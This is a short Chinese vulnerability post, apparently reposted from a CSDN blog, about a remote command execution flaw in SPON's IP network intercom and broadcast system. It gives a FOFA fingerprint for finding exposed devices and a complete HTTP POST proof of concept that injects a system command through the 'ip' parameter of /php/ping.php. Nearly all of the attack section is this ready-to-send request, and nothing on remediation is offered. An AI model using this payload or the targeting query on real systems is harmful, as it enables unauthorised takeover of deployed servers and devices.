世邦通信股份有限公司IP网络对讲广播系统RCE

漏洞描述

SPON世邦IP网络广播系统采用的IPAudio™技术, 将音频信号以数据包形式在局域网和广域网上进行传送，是一套纯数字传输的双向音频扩声系统。传统广播系统存在的音质不佳，传输距离有限，缺乏互动等问题。该系统设备使用简便，只需将终端接入计算机网络即可构成功能强大的数字广播系统，每个接入点无需单独布线，实现计算机网络、数字视频监控、公共广播的多网合一。其存在RCE漏洞，攻击者可通过此漏洞执行系统命令，进而控制服务器

漏洞复现

FOFA

icon_hash="-1830859634"

POC

POST /php/ping.php HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig

bp 成功执行命令

原文地址：https://blog.csdn.net/2301_77012231/article/details/142697359

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！